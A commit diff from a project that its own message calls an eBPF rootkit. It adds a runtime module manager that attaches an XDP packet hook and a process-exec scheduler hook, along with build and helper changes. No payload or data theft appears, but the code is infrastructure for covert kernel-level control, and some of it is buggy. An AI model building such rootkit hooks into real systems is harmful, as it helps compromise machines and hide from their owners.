Completed configuration module which enables to change the running ebpf modules in the rootkit at runtime. Minor changes and updated code structure

.vscode/settings.json

@@ -8,6 +8,7 @@
         "unistd.h": "c",
         "xdp_filter.h": "c",
         "module_manager.h": "c",
-        "modules.h": "c"
+        "modules.h": "c",
+        "libbpf.h": "c"
     }
 }

src/Makefile

@@ -82,20 +82,22 @@ $(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT)
 # Build user-space code
 $(patsubst %,$(OUTPUT)/%.o, $(APPS)): %.o: %.skel.h
 
-#User includes
+
-$(USER_INCLUDES_OBJ): $(wildcard $(USER_INCLUDES_SRC)/**/*.h)| $(OUTPUT)
+#User includes and modules
+$(USER_INCLUDES_OBJ): $(wildcard $(USER_INCLUDES_SRC)/**/*.h) | $(OUTPUT)
 	$(call msg,CC,$@)
-	$(Q)$(CC) $(CFLAGS) -I$(wildcard $(USER_INCLUDES_SRC)/*.h) -c $(wildcard $(USER_INCLUDES_SRC)/*.c) -o $@
+	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -c $(USER_INCLUDES_SRC) -o $@
 
 #User code
-$(OUTPUT)/%.o: $(USER)/%.c $(wildcard $(USER)/%.h)| $(OUTPUT)
+$(OUTPUT)/%.o: $(USER)/%.c $(wildcard $(USER)/*.h)| $(OUTPUT)
 	$(call msg,CC,$@)
 	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -c $(filter $(USER)/%.c,$^) -o $@
 
 # Build application binary
-$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) $(USER_INCLUDES_SRC)| $(OUTPUT)
+$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) $(USER_INCLUDES_OBJ) | $(OUTPUT)
 	$(call msg,BINARY,$@)
-	$(Q)$(CC) $(CFLAGS) $^ -lelf -lz -o bin/$@
+	$(Q)$(CC) $(CFLAGS) $(INCLUDES) $^ -lelf -lbpf -lz -o bin/$@
+	$(Q)rm $(USER_INCLUDES_OBJ)
 
 # delete failed targets
 .DELETE_ON_ERROR:

src/user/include/modules/common.h

@@ -0,0 +1,15 @@
+#ifndef __MODULE_COMMON_H
+#define __MODULE_COMMON_H
+
+#include <linux/bpf.h>
+#include <bpf/libbpf.h>
+
+int detach_link_generic(struct bpf_link *link){
+    int ret = bpf_link__destroy(link);
+    if(ret!=0){
+        return -1;
+    }
+    return 0;
+}
+
+#endif

src/user/include/modules/module_manager.c

@@ -1,12 +1,50 @@
 #include "module_manager.h"
+#include "xdp.h"
+#include "sched.h"
 
 module_config_t module_config = {
     .xdp_module = {
         .all = ON,
-        .xdp_receive = ON
+        .xdp_receive = OFF
     },
     .sched_module = {
         .all = ON,
-        .handle_sched_process_exec = ON
+        .handle_sched_process_exec = OFF
     }
 };
+
+module_config_attr_t module_config_attr = {
+    .skel = NULL,
+    .xdp_module = {
+        .ifindex = -1,
+        .flags = -1
+    },
+    .sched_module = {}
+};
+
+
+int setup_all_modules(){
+    //Alias
+    module_config_t config = module_config;
+    module_config_attr_t attr = module_config_attr;
+    int ret;
+
+    //XDP
+    if(config.xdp_module.all == ON){
+        ret = attach_xdp_all(attr.skel, attr.xdp_module.ifindex, attr.xdp_module.flags);
+    }else{
+        if(config.xdp_module.xdp_receive == ON) ret = attach_xdp_receive(attr.skel, attr.xdp_module.ifindex, attr.xdp_module.flags);
+    }
+    if(ret!=0) return -1;
+
+    //SCHED
+    if(config.sched_module.all == ON){
+        ret = attach_sched_all(attr.skel);
+    }else{
+        if(config.sched_module.handle_sched_process_exec == ON) ret = attach_handle_sched_process_exec(attr.skel);
+    }
+    if(ret!=0) return -1;
+
+
+    return 0;
+}

src/user/include/modules/module_manager.h

@@ -2,11 +2,16 @@
 #define __MOD_MANAGER_H
 
 #include <stdint.h>
+#include <unistd.h>
+#include <linux/types.h>
+
 
 #define ON 1
 #define OFF 0
 
-//Centralized configutation struct
+//Centralized configutation struct.
+//Used by the module manager to decide which modules to load
+//If <all> is set in a module, the other configurations are ignored
 typedef struct module_config_t{
     struct xdp_module {
         char all;
@@ -20,6 +25,30 @@ typedef struct module_config_t{
 
 } module_config_t;
 
+//Configuration struct. Used by the module manager to
+//correctly attach the needed modules, providing necessary params
+typedef struct module_config_attr_t{
+    struct xdp_filter_bpf *skel;
+    struct xdp_module_attr {
+        __u32 ifindex;
+        __u32 flags;
+    } xdp_module;
+
+    struct sched_module_attr {
+        void* __empty;
+    }sched_module;
+
+} module_config_attr_t;
+
+//An unique module configutation struct and attr
 extern module_config_t module_config;
+extern module_config_attr_t module_config_attr;
+
+/**
+ * @brief Installs the ebpf modules according to the module_config
+ * 
+ * @return 0 if ok, -1 if error
+ */
+int setup_all_modules();
 
 #endif

src/user/include/modules/sched.h

@@ -2,9 +2,15 @@
 #define __MOD_SCHED_H
 
 #include <linux/bpf.h>
+#include <bpf/bpf.h>
 #include <bpf/libbpf.h>
+#include "common.h"
 #include "xdp_filter.skel.h"
 
+//TODO RESOLVE THE FACT THAT THESE ARE NOT COMPILED WITH REFERENCE TO XDP_FILTER_BPF
+//COMPLETE CONFIG
+//CHECK EVERYTHING STILL WORKS
+
 //Connections
 int attach_handle_sched_process_exec(struct xdp_filter_bpf *skel){
     skel->links.handle_sched_process_exec = bpf_program__attach(skel->progs.handle_sched_process_exec);
@@ -17,15 +23,17 @@ int attach_sched_all(struct xdp_filter_bpf *skel){
 
 
 //Disconnections
-int detach_link_generic(struct bpf_link *link){
+int detach_handle_sched_process_exec(struct xdp_filter_bpf *skel){
-    int ret = bpf_link__destroy(link);
+    int err = detach_link_generic(skel->links.handle_sched_process_exec);
-    if(ret!=0){
+    if(err<0){
+        fprintf(stderr, "Failed to detach sched link\n");
         return -1;
     }
     return 0;
 }
+
 int detach_sched_all(struct xdp_filter_bpf *skel){
-    return detach_link_generic(skel->links.handle_sched_process_exec);
+    return detach_handle_sched_process_exec(skel);
 }
 
 

src/user/include/modules/xdp.h

@@ -1,7 +1,14 @@
 #ifndef __MOD_XDP_H
 #define __MOD_XDP_H
 
-int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
+#include <bpf/bpf.h>
+#include <bpf/libbpf.h>
+#include <linux/if_link.h>
+#include "common.h"
+#include <sys/resource.h>
+#include "xdp_filter.skel.h"
+
+int attach_xdp_receive(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
     //Attach BPF program to network interface
 	//New way of doing it: it allows for future addition of multiple 
 	//XDP programs attached to same interface if needed
@@ -47,14 +54,22 @@ int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
     return 0;
 }
 
-int detach_xdp_all(struct xdp_filter_bpf *skel){
+int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
-    int err = bpf_link__destroy(skel->links.xdp_receive);
+    return attach_xdp_receive(skel, ifindex, flags);
+}
+
+
+int detach_xdp_receive(struct xdp_filter_bpf *skel){
+    int err = detach_link_generic(skel->links.xdp_receive);
     if(err<0){
         fprintf(stderr, "Failed to detach XDP program\n");
 		return -1;
     }
-
     return 0;
 }
 
+int detach_xdp_all(struct xdp_filter_bpf *skel){
+    return detach_xdp_receive(skel);
+}
+
 #endif

src/user/xdp_filter.c

@@ -18,8 +18,14 @@
 #include "include/utils/files/path.h"
 #include "include/utils/strings/regex.h"
 #include "include/utils/structures/fdlist.h"
-#include "include/modules/sched.h"
+#include "include/modules/module_manager.h"
-#include "include/modules/xdp.h"
+
+#define ABORT_IF_ERR(err, msg)\
+	if(err<0){\
+		fprintf(stderr, msg);\
+		goto cleanup\
+	}
+
 
 static struct env {
 	bool verbose;
@@ -183,20 +189,17 @@ int main(int argc, char**argv){
 		goto cleanup;
 	}
 
-	//Attach XDP module
+	//Attach XDP and sched modules using module manager
-	__u32 flags = XDP_FLAGS_REPLACE;
+	//and setup the parameters for the installation
-	err = attach_xdp_all(skel, ifindex, flags);
+	//XDP
-	if(err<0){
+	module_config.xdp_module.all = ON;
-		goto cleanup;
+	module_config_attr.xdp_module.flags = XDP_FLAGS_REPLACE;
-	}
+	module_config_attr.xdp_module.ifindex = ifindex;
-
+	//SCHED
-	//Attach sched module (testing)
+	module_config.sched_module.all = ON;
-	err = attach_handle_sched_process_exec(skel);
-	if (err<0) {
-		fprintf(stderr, "Failed to attach sched module\n");
-		goto cleanup;
-	}
 	
+	module_config_attr.skel = skel;
+	err = setup_all_modules();
 
 	// Set up ring buffer polling --> Main communication buffer kernel->user
 	rb = ring_buffer__new(bpf_map__fd(skel->maps.rb_comm), handle_rb_event, NULL, NULL);
@@ -223,7 +226,7 @@ int main(int argc, char**argv){
 	}
 
 	//Received signal to stop, detach program from network interface
-	err = detach_sched_all(skel);
+	/*err = detach_sched_all(skel);
 	if(err<0){
 		perror("ERR");
 		goto cleanup;
@@ -232,13 +235,12 @@ int main(int argc, char**argv){
 	if(err<0){
 		perror("ERR");
 		goto cleanup;
-	}
+	}*/
 
-    cleanup:
+cleanup:
-		ring_buffer__free(rb);
+	ring_buffer__free(rb);
-        //xdp_filter_bpf__destroy(skel);
+	//xdp_filter_bpf__destroy(skel);
-
+	if(err!=0) return -1;
-        return err < 0 ? -err : 0;
 
     return 0;
 }